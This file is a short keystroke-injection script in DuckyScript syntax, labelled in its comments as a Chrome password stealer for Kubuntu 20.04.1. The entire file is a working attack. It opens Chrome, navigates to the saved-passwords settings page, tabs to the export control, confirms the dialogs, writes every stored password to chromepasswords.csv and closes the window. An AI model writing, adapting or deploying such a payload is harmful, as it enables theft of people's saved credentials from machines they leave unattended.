REM Author : Gwendoline Dossegger
REM Chrome password stealer for Kubuntu 20.04.1
REM ------ opens chrome web browser
ALT ESPACE
DELAY 500
STRING Google chrome
DELAY 400
ENTER
DELAY 600
REM ------ exports passwords into csv file & close the page after finishing
STRING chrome://settings/passwords
ENTER
DELAY 1000
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 700
STRING chromepasswords.csv
DELAY 200
ENTER
DELAY 1000
ALT F4
